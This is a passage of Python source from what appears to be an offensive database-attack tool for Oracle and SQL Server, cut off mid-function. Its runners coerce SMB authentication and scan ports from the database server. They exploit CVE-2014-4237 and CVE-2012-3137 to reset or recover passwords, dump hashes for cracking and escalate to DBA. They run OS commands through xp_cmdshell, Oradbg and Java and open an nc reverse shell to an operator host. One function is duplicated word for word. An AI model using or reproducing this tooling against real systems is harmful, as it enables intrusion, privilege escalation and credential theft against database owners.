    Run the SMB module (Oracle).

    Handled options: test-module (SMB.testAll) and captureSMBAuthentication
    HOST SHARE, which asks the database server to connect to the UNC path
    HOST/SHARE through SMB.captureSMBAuthentication; the runner only reports
    whether the module returned an Exception, the capture itself happens in
    an external tool.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", 'captureSMBAuthentication']) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    smb = SMB(args)
    status = smb.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if SMB authentication capture can be possible")
        status = smb.testAll()
    # Option 1: capture SMB authentication
    captureOpt = args['captureSMBAuthentication']
    if captureOpt != None:
        host, share = captureOpt[0], captureOpt[1]
        out.title("Try to capture the SMB authentication (Connection to \\\\{0}\\{1} )".format(host, share))
        status = smb.captureSMBAuthentication(host, share)
        if isinstance(status, Exception):
            out.badNews("Impossible to capture the SMB authentication")
        else:
            out.goodNews("Check your SMB capture tool ...")
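def runUtlTcpModule(args):
    '''
    Run the UTL_TCP module (Oracle).

    Handled options: test-module, send-packet A B FILE (A and B are passed
    positionally to UtlTcp.sendPacket — presumably host and port — and the
    file content is sent; the answer is printed) and scan-ports HOST PORTS
    (TCP scan run by the database server through UtlTcp.scanTcpPorts; PORTS
    is a comma-separated list or a range "a-b").

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    -1 when the PORTS specification is not recognized, otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "send-packet", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    utlTcp = UtlTcp(args)
    status = utlTcp.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if the UTL_TCP library can be used")
        status = utlTcp.testAll()
    # Option 1: send packet
    sendOpt = args['send-packet']
    if sendOpt != None:
        out.title("Send the packet stored in the {0} file".format(sendOpt[2]))
        data = utlTcp.sendPacket(sendOpt[0], sendOpt[1], filename=sendOpt[2])
        if isinstance(data, Exception):
            out.badNews("Impossible to send the packet: {0}".format(data))
        else:
            out.goodNews("Response from the server:\n{0}".format(data))
    # Option 2: tcp scan
    scanOpt = args['scan-ports']
    if scanOpt != None:
        target, portSpec = scanOpt[0], scanOpt[1]
        if "," in portSpec:
            ports = portSpec.split(',')
        elif '-' in portSpec:
            # range() excludes the upper bound, as in the original
            bounds = portSpec.split('-')
            ports = [str(p) for p in range(int(bounds[0]), int(bounds[1]))]
        else:
            # The original only logged here and then ran the scan with an
            # empty port list; abort instead, as the UTL_HTTP runner does.
            logging.error("Syntax for ports given not recognized")
            utlTcp.close()
            return -1
        out.title("Scan ports ({0}) of {1} ".format(portSpec, target))
        resultats = utlTcp.scanTcpPorts(httpObject=utlTcp, ip=target, ports=ports)
        utlTcp.printScanPortResults(resultats)
    utlTcp.close()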
def runOradbgModule(args):
    '''
    Run the Oradbg module (Oracle).

    Handled options: test-module (Oradbg.testAll) and exec CMD
    (Oradbg.execOSCommand; success is reported only when the module returns
    the literal True, and the success message itself says "probably").

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    oradbg = Oradbg(args)
    status = oradbg.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if the Oradbg can be used")
        status = oradbg.testAll()
    # Option 1: exec
    command = args['exec']
    if command != None:
        server = args['server']
        out.title("Execute the `{0}` on the {1} server".format(command, server))
        outcome = oradbg.execOSCommand(command)
        if outcome == True:
            out.goodNews("The `{0}` command was executed on the {1} server (probably)".format(command, server))
        else:
            out.badNews("The `{0}` command was not executed on the {1} server: {2}".format(command, server, str(outcome)))
    oradbg.close()
def runCVEXXXYYYModule(args):
    '''
    Run the CVE_XXXX_YYYY module (Oracle).

    With set-pwd-2014-4237 USER PASSWORD, the 11g and 10g hashes of PASSWORD
    are computed (oracle11.encrypt / oracle10.encrypt), two UPDATE
    statements on SYS.USER$ are built (plain, and through an inline view)
    and passed to CVE_XXXX_YYYY.exploit_CVE_2014_4237; its result is
    reported with a distinct message for True, False and None.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "set-pwd-2014-4237"], checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    cve = CVE_XXXX_YYYY(args)
    status = cve.connection(stopIfError=True)
    if args['test-module'] == True:
        cve.testAll()
    pwdOpt = args['set-pwd-2014-4237']
    if pwdOpt != None:
        username, newPassword = pwdOpt[0], pwdOpt[1]
        hash11g = oracle11.encrypt(newPassword)
        hash10g = oracle10.encrypt(newPassword, user=username)
        logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(hash11g, hash10g, username))
        # Only {0} (user) and {2} (11g hash) are used by the templates; the
        # 10g hash is passed but unused, exactly as in the original.
        updateWithView = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(username, hash10g, hash11g)
        updatePlain = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(username, hash10g, hash11g)
        args['print'].title("Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(username, hash10g, hash11g))
        outcome = cve.exploit_CVE_2014_4237(updateRequestNormal=updatePlain, updateRequestWithView=updateWithView)
        # The reporter is read through cve.args here, as the original did.
        if outcome == True:
            cve.args['print'].goodNews("The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!".format(username, newPassword))
        elif outcome == False:
            cve.args['print'].badNews("The password of '{0}' has NOT been replaced".format(username))
        elif outcome == None:
            cve.args['print'].goodNews("The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!".format(username))
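def runDbmsLob(args):
    '''
    Run the DbmsLob module (Oracle): read a file on the database server
    through DBMS_LOB.

    Handled options: test-module and getFile DIR NAME LOCAL (DbmsLob.getFile
    reads NAME in directory DIR; the message reports a copy in LOCAL).  The
    result is reported distinctly for an Exception, False (file does not
    exist), '' (empty file) and data.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    dbmsLob = DbmsLob(args)
    status = dbmsLob.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if the DbmsLob module can be used")
        status = dbmsLob.testAll()
    # Option 1: getFile
    if args['getFile'] != None:
        remoteDir, remoteName, localPath = args['getFile'][0], args['getFile'][1], args['getFile'][2]
        out.title("Read the {0} file stored in the {1} path".format(remoteName, remoteDir))
        data = dbmsLob.getFile(remotePath=remoteDir, remoteNameFile=remoteName, localFile=localPath)
        if isinstance(data, Exception):
            out.badNews("There is an error: {0}".format(data))
        elif data == False:
            out.badNews("The {0} file in {1} doesn't exist".format(remoteName, remoteDir))
        elif data == '':
            # the original formatted the whole option list here instead of the file name
            out.badNews("The {0} file is empty".format(remoteName))
        else:
            out.goodNews("Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}".format(remoteName, remoteDir, localPath, data))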
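def runUtlFileModule(args):
    '''
    Run the UTL_FILE module (Oracle): read, upload and delete files on the
    database server through the UTL_FILE package wrapped by UtlFile.

    Handled options (each a list of positional values):
      * getFile DIR NAME LOCAL   -> read NAME in directory DIR, print it and
                                    save a copy to LOCAL (UtlFile.writeFile)
      * putFile DIR NAME LOCAL   -> create NAME in DIR from the local file
      * removeFile DIR NAME      -> delete NAME in DIR
    getFile reports three failure kinds distinctly: an Exception, False
    (file does not exist) and '' (empty file).

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile", 'putFile', 'removeFile']) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    utlFile = UtlFile(args)
    status = utlFile.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if the UTL_FILE library can be used")
        status = utlFile.testAll()
    # Option 1: read file
    if args['getFile'] != None:
        remoteDir, remoteName, localPath = args['getFile'][0], args['getFile'][1], args['getFile'][2]
        out.title("Read the {0} file stored in {1} on the {2} server".format(remoteName, remoteDir, args['server']))
        # The length is not used by this runner; the call is kept because the
        # original made it (it may query the server) — TODO confirm it is needed.
        utlFile.getLength(remoteDir, remoteName)
        data = utlFile.getFile(remoteDir, remoteName)
        if isinstance(data, Exception):
            # the two messages below formatted the whole option list where the file name was meant
            out.badNews("Impossible to read the {0} file: {1}".format(remoteName, data))
        elif data == False:
            out.badNews("The {0} file in {1} doesn't exist".format(remoteName, remoteDir))
        elif data == '':
            out.badNews("The {0} file is empty".format(remoteName))
        else:
            out.goodNews("Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}".format(remoteName, remoteDir, localPath, data))
            # NOTE(review): the flattened original does not show on which
            # branch this write sat; a local copy is only meaningful on success.
            utlFile.writeFile(localPath, data)
    # Option 2: put file
    if args['putFile'] != None:
        remoteDir, remoteName, localPath = args['putFile'][0], args['putFile'][1], args['putFile'][2]
        out.title("Put the {0} local file in the {1} folder like {2} on the {3} server".format(localPath, remoteDir, remoteName, args['server']))
        status = utlFile.putFile(remoteDir, remoteName, localFile=localPath)
        if isinstance(status, Exception):
            out.badNews("Impossible to put the {0} file: {1}".format(localPath, status))
        else:
            out.goodNews("The {0} file was created on the {1} directory on the {2} server like the {3} file".format(localPath, remoteDir, args['server'], remoteName))
    # Option 3: remove file
    if args['removeFile'] != None:
        remoteDir, remoteName = args['removeFile'][0], args['removeFile'][1]
        out.title("Remove the {0} file stored in the {1} folder on the {2} server".format(remoteName, remoteDir, args['server']))
        status = utlFile.deleteFile(remoteDir, remoteName)
        if isinstance(status, Exception):
            out.badNews("Impossible to remove the {0} file: {1}".format(remoteName, status))
        else:
            out.goodNews("The {0} file was deleted on the {1} directory on the {2} server".format(remoteName, remoteDir, args['server']))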
def runUtlHttpModule(args):
    '''
    Run the UTL_HTTP module (Oracle).

    ``args`` is the parsed-option mapping used by every module runner, with
    ``args['print']`` as the title/goodNews/badNews reporter.  Handled
    options: test-module, send (request read from a file and replayed by
    UtlHttp.sendRequest) and scan-ports (TCP scan run by the database
    server through UtlHttp.scanTcpPorts).

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    -1 when the port specification of scan-ports cannot be parsed, otherwise
    None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "scan-ports", "send"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    utlHttp = UtlHttp(args)
    status = utlHttp.connection(stopIfError=True)
    utlHttp.setTimeout(5)  # unit not visible here; presumably seconds — confirm in UtlHttp
    if args['test-module'] == True:
        out.title("Test if the UTL_HTTP library can be used")
        status = utlHttp.testAll()
    # Option 1: sendRequest
    sendOpt = args['send']
    if sendOpt != None:
        out.title("Send the HTTP request stored in the {0} file".format(sendOpt[2]))
        response = utlHttp.sendRequest(sendOpt[0], sendOpt[1], sendOpt[2])
        if isinstance(response, Exception):
            out.badNews("Impossible to send the request: {0}".format(response))
        else:
            out.goodNews("Response from the server:\n{0}".format(response))
    # Option 2: scan-ports
    scanOpt = args['scan-ports']
    if scanOpt != None:
        target, portSpec = scanOpt[0], scanOpt[1]
        ports = []
        if "," in portSpec:
            ports = portSpec.split(',')
        elif '-' in portSpec:
            # range() excludes the upper bound, as in the original
            bounds = portSpec.split('-')
            ports = [str(p) for p in range(int(bounds[0]), int(bounds[1]))]
            if ports == []:
                logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(portSpec))
                return -1
        elif portSpec.isdigit() == True:
            ports = [portSpec]
        else:
            logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(portSpec))
            return -1
        out.title("Scan ports ({0}) of {1} ".format(portSpec, target))
        resultats = utlHttp.scanTcpPorts(httpObject=utlHttp, ip=target, ports=ports)
        utlHttp.printScanPortResults(resultats)
    utlHttp.close()
def runCVEXXXYYYModule(args):
    '''
    Run the CVE_XXXX_YYYY module (Oracle).

    With set-pwd-2014-4237 USER PASSWORD, the 11g and 10g hashes of PASSWORD
    are computed (oracle11.encrypt / oracle10.encrypt), two UPDATE
    statements on SYS.USER$ are built (plain, and through an inline view)
    and passed to CVE_XXXX_YYYY.exploit_CVE_2014_4237; its result is
    reported with a distinct message for True, False and None.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "set-pwd-2014-4237"], checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    cve = CVE_XXXX_YYYY(args)
    status = cve.connection(stopIfError=True)
    if args['test-module'] == True:
        cve.testAll()
    pwdOpt = args['set-pwd-2014-4237']
    if pwdOpt != None:
        username, newPassword = pwdOpt[0], pwdOpt[1]
        hash11g = oracle11.encrypt(newPassword)
        hash10g = oracle10.encrypt(newPassword, user=username)
        logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(hash11g, hash10g, username))
        # Only {0} (user) and {2} (11g hash) are used by the templates; the
        # 10g hash is passed but unused, exactly as in the original.
        updateWithView = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(username, hash10g, hash11g)
        updatePlain = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(username, hash10g, hash11g)
        args['print'].title("Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(username, hash10g, hash11g))
        outcome = cve.exploit_CVE_2014_4237(updateRequestNormal=updatePlain, updateRequestWithView=updateWithView)
        # The reporter is read through cve.args here, as the original did.
        if outcome == True:
            cve.args['print'].goodNews("The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!".format(username, newPassword))
        elif outcome == False:
            cve.args['print'].badNews("The password of '{0}' has NOT been replaced".format(username))
        elif outcome == None:
            cve.args['print'].goodNews("The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!".format(username))
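def runCVE20123137Module(args):
    '''
    Run the CVE_2012_3137 module (Oracle).

    Handled options:
      * test-module        -> CVE_2012_3137.testAll()
      * get-all-passwords  -> requires root (geteuid() == 0); collects keys
                              with getPasswords()/getKeys() and saves them to
                              a ``sessions-<server>-<port>-<sid>`` file in the
                              current directory
      * decrypt-sessions A B -> CVE_2012_3137.decryptKeys(A, B); each
                              (account, password) pair found is printed

    ``args`` is the parsed-option mapping used by every module runner, with
    ``args['print']`` as reporter; ``args['user-list']`` and
    ``args['timeSleep']`` are handed to the module constructor.

    Returns EXIT_MISS_ARGUMENT when none of the module's options was given,
    otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "get-all-passwords", "decrypt-sessions"], checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    cve = CVE_2012_3137(args, accountsFile=args['user-list'], timeSleep=args['timeSleep'])
    if args['test-module'] == True:
        cve.testAll()
    # Option 1: get all passwords
    if args['get-all-passwords'] != None:
        # The original had a bare `print` here (a Python 2 print statement
        # that is a no-op expression under Python 3); it is dropped.
        if geteuid() != 0:
            out.badNews("Sorry, you need to run this as root because I need to sniff authentications to the database")
        else:
            out.title("Getting remote passwords on the {0} server, port {1}".format(args['server'], args['port']))
            cve.getPasswords()
            keys = cve.getKeys()
            if keys != []:
                out.goodNews("Here are keys:\n\n{0}\n\nIf for some users keys are empty, there was an error during capture or this Oracle user does not exist on the database".format('\n'.join(keys)))
                filename = "sessions-{0}-{1}-{2}{3}".format(args['server'], args['port'], args['sid'], CHALLENGE_EXT_FILE)
                # `with` closes the file even when write() fails; the original
                # left it open on error.  The file holds captured authentication
                # material — treat it as sensitive data.
                with open(filename, "w") as fh:
                    fh.write('\n'.join(keys))
                out.goodNews("Sessions strored in the {0} file.".format(filename))
            else:
                out.badNews("Impossible to exploit this vulnreability")
    # Option 2: decrypt sessions
    if args['decrypt-sessions'] != None:
        sessionsFile, secondArg = args['decrypt-sessions'][0], args['decrypt-sessions'][1]
        out.title("Decrypt sessions stored in {0} via {1}".format(sessionsFile, secondArg))
        passwds = cve.decryptKeys(sessionsFile, secondArg)
        if passwds != []:
            # one "account:password" line per pair, trailing newline kept
            passwordsStr = "".join('{0}:{1}\n'.format(e[0], e[1]) for e in passwds)
            out.goodNews("Accounts found:\n{0}".format(passwordsStr))
        else:
            out.badNews("No password has been found")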
def runXpCmdShellModule(args):
    ''' Run the XpCmdShell module '''
    if checkOptionsGivenByTheUser(args, ["test-module", "shell", "enable-xpcmdshell", "disable-xpcmdshell"], checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    xpcmdshell = Xpcmdshell(args)
    xpcmdshell.connect()
    if args["test-module"] == True:
        xpcmdshell.testAll()
    # Stays True unless a requested re-enable fails; gates the disable step below.
    enableSucceeded = True
    if args["enable-xpcmdshell"] == True:
        args['print'].title("Re-enable Xpcmdshell")
        enableSucceeded = xpcmdshell.enableXpcmdshell()
        if enableSucceeded == True:
            args['print'].goodNews("Xpcmdshell is re-enabled")
        else:
            args['print'].badNews("Xpcmdshell is NOT re-enabled")
    if args["shell"] == True:
        args['print'].title("Trying to get a shell thanks to xpcmdshell")
        shellStatus = xpcmdshell.getInteractiveShell()
        if shellStatus == True:
            args['print'].goodNews("Good Bye :)")
        else:
            args['print'].badNews("Impossible to get a shell on the database")
    # Only revert what could have been changed: skip the disable when the re-enable failed.
    if args["disable-xpcmdshell"] == True and enableSucceeded == True:
        args['print'].title("Disable Xpcmdshell")
        disableStatus = xpcmdshell.disableXpcmdshell()
        if disableStatus == True:
            args['print'].goodNews("Xpcmdshell is disabled")
        else:
            args['print'].badNews("Xpcmdshell is NOT disabled: {0}".format(disableStatus))
    xpcmdshell.closeConnection()
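def runjavaModule(args):
    ''' Run the JAVA module '''
    status = True
    # "exec" is consumed below, so it must count as a valid option here; without it a run
    # that only passes --exec is rejected as a missing argument before anything happens.
    if checkOptionsGivenByTheUser(args, ["test-module", "exec", "shell", "reverse-shell"]) == False:
        return EXIT_MISS_ARGUMENT
    java = Java(args)
    status = java.connection(stopIfError=True)
    if args['test-module'] == True:
        # the previous title named DBMSScheduler (copy-paste from another module)
        args['print'].title("Test if the Java library can be used")
        status = java.testAll()
    # Option 1: exec — the Java class/function are created for this call and dropped afterwards
    if args['exec'] != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'], args['server']))
        status = java.execOSCommand(cmd=args['exec'], printResponse=True, needCreateClassAndFunction=True, needDeleteClassAndFunction=True)
    # Option 2: shell
    if args['shell'] == True:
        args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
        java.getInteractiveShell()
    # Option 3: reverse shell back to (ip, port)
    if args['reverse-shell'] != None:
        args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
        java.giveReverseShell(localip=args['reverse-shell'][0], localport=args['reverse-shell'][1])
    java.close()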
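def _printHashedPasswordsInAllFormats(args, passwords, accountsNote):
    ''' Print the collected hashes in native, oclHashcat and John formats; accountsNote is the parenthetical appended to each heading '''
    args['print'].goodNews("Here are Oracle hashed passwords {0}:".format(accountsNote))
    passwords.printPasswords()
    args['print'].goodNews("Here are 10g Oracle hashed passwords for oclHashcat {0}:".format(accountsNote))
    passwords.printPasswordsOclHashcat()
    args['print'].goodNews("Here are 10g Oracle hashed passwords for John the Ripper {0}:".format(accountsNote))
    passwords.printPasswordsJohn()


def runPasswordsModule(args):
    ''' Run the Passwords module '''
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "get-passwords", "get-passwords-from-history", "get-passwords-not-locked"]) == False:
        return EXIT_MISS_ARGUMENT
    passwords = Passwords(args)
    status = passwords.connection(stopIfError=True)
    # result discarded here; presumably primes internal state — TODO confirm against Passwords
    passwords.__getLockedUsernames__()
    # `in` instead of dict.has_key(): same semantics, and has_key() does not exist on Python 3
    if 'info' not in args:
        info = Info(args)
        info.loadInformationRemoteDatabase()
        args['info'] = info
    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        status = passwords.testAll()
    if args['get-passwords'] == True:
        args['print'].title("Try to get Oracle hashed passwords")
        status = passwords.__tryToGetHashedPasswords__()
        if status == True:
            _printHashedPasswordsInAllFormats(args, passwords, "(some accounts can be locked)")
        else:
            args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-not-locked'] == True:
        args['print'].title("Try to get Oracle hashed passwords when the account is not locked")
        # locked accounts are excluded from the dump
        blacklistOfUsernames = passwords.__getLockedUsernames__()
        status = passwords.__tryToGetHashedPasswords__(blacklistOfUsernames)
        if status == True:
            _printHashedPasswordsInAllFormats(args, passwords, "(all accounts are opened, not locked)")
        else:
            args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-from-history'] == True:
        args['print'].title("Try to get Oracle hashed passwords from history")
        status = passwords.__tryToGetHashedPasswordsfromHistory__()
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))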
def runSMBAuthenticationCaptureModule(args):
    ''' Run the SMBAuthenticationCapture module '''
    captureOptions = ["capture", "xp-dirtree-capture", "xp-fileexist-capture", "xp-getfiledetails-capture"]
    if checkOptionsGivenByTheUser(args, captureOptions, checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    # Per option: method to call, title, message when it returns True, message otherwise.
    captureMethods = {
        "capture": (
            "tryToCaptureASmbAuthentication",
            "Try to capture a SMB authentication with the xp_dirtree, xp_fileexist or xp_getfiledetails method",
            "You can perhaps capture a SMB authentication with these methods. Check your SMB capture tool !",
            "You can't capture a SMB authentication with these methods",
        ),
        "xp-dirtree-capture": (
            "captureSMBAuthenticationViaXpDirtree",
            "Try to capture a SMB authentication with the xp_dirtree method only",
            "You can perhaps capture a SMB authentication with the xp_dirtree method. Check your SMB capture tool !",
            "You can't capture a SMB authentication with the xp_dirtree method",
        ),
        "xp-fileexist-capture": (
            "captureSMBAuthenticationViaXpFileexist",
            "Try to capture a SMB authentication with the xp_fileexist method only",
            "You can perhaps capture a SMB authentication with the xp_fileexist method. Check your SMB capture tool !",
            "You can't capture a SMB authentication with the xp_fileexist method",
        ),
        "xp-getfiledetails-capture": (
            "captureSMBAuthenticationViaXpGetFileDetails",
            "Try to capture a SMB authentication with the xp_getfiledetails method only",
            "You can perhaps capture a SMB authentication with the xp_getfiledetails method. Check your SMB capture tool !",
            "You can't capture a SMB authentication with the xp_getfiledetails method",
        ),
    }
    # The first option present wins (same precedence as an if/elif chain); with none of them
    # the listener address falls back to localhost.
    chosenOption = None
    for optionName in captureOptions:
        if args[optionName] != None:
            chosenOption = optionName
            break
    listenerIp = "127.0.0.1" if chosenOption is None else args[chosenOption][0]
    smbAuthenticationCapture = SMBAuthenticationCapture(args, listenerIp, args['share-name'][0])
    smbAuthenticationCapture.connect()
    # NOTE(review): "test-module" is read here but is not in the option list checked above — confirm
    # checkOptionsGivenByTheUser accepts it on its own.
    if args["test-module"] == True:
        smbAuthenticationCapture.testAll()
    if chosenOption is not None:
        methodName, title, perhapsMessage, failureMessage = captureMethods[chosenOption]
        args['print'].title(title)
        # A True only means the UNC request was issued; the capture itself happens on the listener.
        status = getattr(smbAuthenticationCapture, methodName)()
        if status == True:
            args['print'].unknownNews(perhapsMessage)
        else:
            args['print'].badNews(failureMessage)
    smbAuthenticationCapture.closeConnection()
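def _reportDbaRoleGrant(args, status, reportFailure):
    ''' Print the outcome of a "grant DBA role" attempt; reportFailure also reports a plain False result '''
    if isinstance(status, Exception):
        args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(status))
    elif status == None:
        args['print'].unknownNews("The current user has already DBA role")
    elif status == True:
        args['print'].goodNews("The DBA role has been granted to this current user")
    elif reportFailure:
        args['print'].badNews("The DBA role has NOT been granted to this current user")


def _reportSystemRequest(args, status):
    ''' Print the outcome of a "run this request as SYSTEM" attempt (a plain False is silent) '''
    if isinstance(status, Exception):
        args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status))
    elif status == True:
        args['print'].goodNews("The request has been executed successfully as system")


def runPrivilegeEscalationModule(args):
    ''' Run the PrivilegeEscalation module (docstring previously said "Passwords", a copy-paste) '''
    status = True
    if checkOptionsGivenByTheUser(args, ["test-module", "revoke-dba-role", "dba-with-execute-any-procedure", "alter-pwd-with-create-any-procedure", "dba-with-create-any-trigger", "dba-with-analyze-any", "dba-with-create-any-index", "exec-with-analyze-any", "exec-with-create-any-index", "exec-with-create-any-trigger", "exec-with-create-any-procedure", "exec-with-execute-any-procedure", "get-privs", "get-detailed-privs"]) == False:
        return EXIT_MISS_ARGUMENT
    privilegeEscalation = PrivilegeEscalation(args)
    status = privilegeEscalation.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the current user can gain elevated access (privilege escalation)")
        status = privilegeEscalation.testAll()
    if args['get-privs'] == True:
        args['print'].title("Get system privileges and roles of current Oracle user")
        status = privilegeEscalation.printPrivilegesAndRoles()
    if args['get-detailed-privs'] == True:
        args['print'].title("Get system privileges and roles of current Oracle user + roles and privileges of roles granted to this current user")
        status = privilegeEscalation.printPrivilegesAndRoles(deep=True)
    if args['revoke-dba-role'] == True:
        currentUser = privilegeEscalation.args['user']
        args['print'].title("Revoke DBA role from current user ({0})".format(currentUser))
        status = privilegeEscalation.revokeDbaRole()
        if isinstance(status, Exception):
            args['print'].badNews("Impossible to revoke DBA role from {0}: {1}".format(currentUser, status))
        else:
            args['print'].goodNews("The DBA role has been revoked from {0}".format(currentUser))
    # The options below are independent `if`s kept in their original order: several may run in
    # one invocation and each one changes server-side state.
    if args['dba-with-execute-any-procedure'] == True:
        args['print'].title("Grant DBA role to current user with CREATE/EXECUTE ANY PROCEDURE method")
        status = privilegeEscalation.giveDbaRoleWithExecuteAnyProcedureMethod()
        _reportDbaRoleGrant(args, status, reportFailure=False)
    if args['alter-pwd-with-create-any-procedure'] != None:
        user, newpwd = privilegeEscalation.args['alter-pwd-with-create-any-procedure'][0], privilegeEscalation.args['alter-pwd-with-create-any-procedure'][1]
        # the new password is echoed in clear in the output below
        args['print'].title("Alter the password of {0} by '{1}' with CREATE ANY PROCEDURE method".format(user, newpwd))
        status = privilegeEscalation.setPasswordWithCreateAnyProcedureMethod(user, newpwd)
        if isinstance(status, Exception):
            args['print'].badNews("Impossible to alter the password of {0}: {1}".format(user, status))
        elif status == True:
            args['print'].goodNews("Password of {0} user modified: The new password of {0} is '{1}'".format(user, newpwd))
    if args['dba-with-create-any-trigger'] == True:
        args['print'].title("Grant DBA role to current user with CREATE ANY TRIGGER method")
        status = privilegeEscalation.giveDbaRoleWithCreateAnyTriggerMethod()
        _reportDbaRoleGrant(args, status, reportFailure=False)
    if args['dba-with-analyze-any'] == True:
        args['print'].title("Grant DBA role to current user with ANALYZE ANY method")
        status = privilegeEscalation.giveDbaRoleWithAnalyzeAnyMethod()
        _reportDbaRoleGrant(args, status, reportFailure=True)
    if args['dba-with-create-any-index'] == True:
        args['print'].title("Grant DBA role to current user with CREATE ANY INDEX method")
        status = privilegeEscalation.giveDbaRoleWithCreateAnyIndexMethod()
        _reportDbaRoleGrant(args, status, reportFailure=True)
    # Semi manual exploitation: run a user-supplied statement as SYSTEM through each technique
    if args['exec-with-execute-any-procedure'] != None:
        args['print'].title("Execute the request as SYSTEM with CREATE/EXECUTE ANY PROCEDURE method")
        status = privilegeEscalation.executeRequestWithExecuteAnyProcedureMethod(privRequest=args['exec-with-execute-any-procedure'][0])
        _reportSystemRequest(args, status)
    if args['exec-with-create-any-procedure'] != None:
        args['print'].title("Execute the request as SYSTEM with CREATE ANY PROCEDURE method only")
        status = privilegeEscalation.executeSytemRequestWithCreateAnyProcedureMethod(privRequest=args['exec-with-create-any-procedure'][0])
        _reportSystemRequest(args, status)
    if args['exec-with-create-any-trigger'] != None:
        args['print'].title("Execute the request as SYSTEM with CREATE ANY TRIGGER method")
        status = privilegeEscalation.executeSytemRequestWithCreateAnyTriggerMethod(privRequest=args['exec-with-create-any-trigger'][0])
        _reportSystemRequest(args, status)
    if args['exec-with-analyze-any'] != None:
        args['print'].title("Execute the request as SYSTEM with ANALYZE ANY method")
        status = privilegeEscalation.executeSytemRequestWithAnalyzeAnyMethod(privRequest=args['exec-with-analyze-any'][0])
        _reportSystemRequest(args, status)
    if args['exec-with-create-any-index'] != None:
        args['print'].title("Execute the request as SYSTEM with CREATE ANY INDEX method")
        status = privilegeEscalation.executeSytemRequestWithCreateAnyIndexMethod(privRequest=args['exec-with-create-any-index'][0])
        _reportSystemRequest(args, status)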
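def runBulkOpenModule(args):
    ''' Run the BulkOpen module '''
    def runBulkInsertForRead(args, bulkOpen):
        ''' Read a remote file with the Bulk Insert method; returns True, or the Exception on failure '''
        remoteFile = args["read-file"][0]
        args['print'].title("Try to read the remote file {0} thanks to the Bulk Insert method".format(remoteFile))
        data = bulkOpen.readFileViaBulkinsert(remoteFile)
        if isinstance(data, Exception):
            args['print'].badNews("Impossible to read the remote file {0} with Bulk Insert: {1}".format(remoteFile, data))
            return data
        # NOTE(review): under Python 3 .encode() yields bytes and this prints a b'...' repr — confirm target interpreter
        args['print'].goodNews("Data stored in the remote file {0}:\n{1}".format(remoteFile, data.encode('utf-8')))
        return True

    def runOpenRowSetForRead(args, bulkOpen):
        ''' Read a remote file with the Openrowset method; returns True, or the Exception on failure '''
        remoteFile = args["read-file"][0]
        args['print'].title("Try to read the remote file {0} thanks to the Openrowset method".format(remoteFile))
        data = bulkOpen.readFileViaOpenRowSet(remoteFile)
        if isinstance(data, Exception):
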